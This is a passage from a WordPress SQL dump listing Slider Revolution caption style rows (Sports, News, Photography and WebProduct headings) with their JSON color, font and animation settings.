(66, '.tp-caption.Sports-DisplayFat', '{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":[\"\"],\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"130px\",\"line-height\":\"130px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(67, '.tp-caption.Sports-Subline', '{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"4px\"},\"hover\":\"\"}', '{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"32px\",\"line-height\":\"32px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":\"0 0 0 0\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":\"0 0 0 0\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(68, '.tp-caption.Instagram-Caption', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(69, '.tp-caption.News-Title', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"70px\",\"line-height\":\"60px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}');
INSERT INTO `zdenl_revslider_css` (`id`, `handle`, `settings`, `hover`, `advanced`, `params`) VALUES
(70, '.tp-caption.News-Subtitle', '{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"0.65\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0px\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"300\",\"easing\":\"Power3.easeInOut\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"24px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto Slab\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(71, '.tp-caption.Photography-Display', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(72, '.tp-caption.Photography-Subline', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}', '{\"color\":\"#777777\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(73, '.tp-caption.Photography-ImageHover', '{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"1000\",\"easing\":\"Power3.easeInOut\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(74, '.tp-caption.Photography-Menuitem', '{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#00ffde\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0.65\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(75, '.tp-caption.Photography-Textblock', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(76, '.tp-caption.Photography-Subline-2', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(77, '.tp-caption.Photography-ImageHover2', '{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"0.5\",\"scalex\":\"0.8\",\"scaley\":\"0.8\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"Back.easeOut\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"22\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Arial\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(78, '.tp-caption.WebProduct-Title', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#333333\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(79, '.tp-caption.WebProduct-SubTitle', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(80, '.tp-caption.WebProduct-Content', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#999999\",\"color-transparency\":\"1\",\"font-size\":\"16px\",\"line-height\":\"24px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),
(81, '.tp-caption.WebProduct-Menuitem', '{\"hover\":\"true\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#999999\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"200\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"500\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"3px\",\"5px\",\"3px\",\"8px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#333333\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(82, '.tp-caption.WebProduct-Title-Light', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#fff\",\"color-transparency\":\"1\",\"font-size\":\"90px\",\"line-height\":\"90px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),
(83, '.tp-caption.WebProduct-SubTitle-Light', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"0.35\",\"font-size\":\"15px\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"parallax\":\"-\"}'),
(84, '.tp-caption.WebProduct-Content-Light', '{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}', '{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"0\",\"easing\":\"Linear.easeNone\"}', '{\"idle\":\"\",\"hover\":\"\"}', 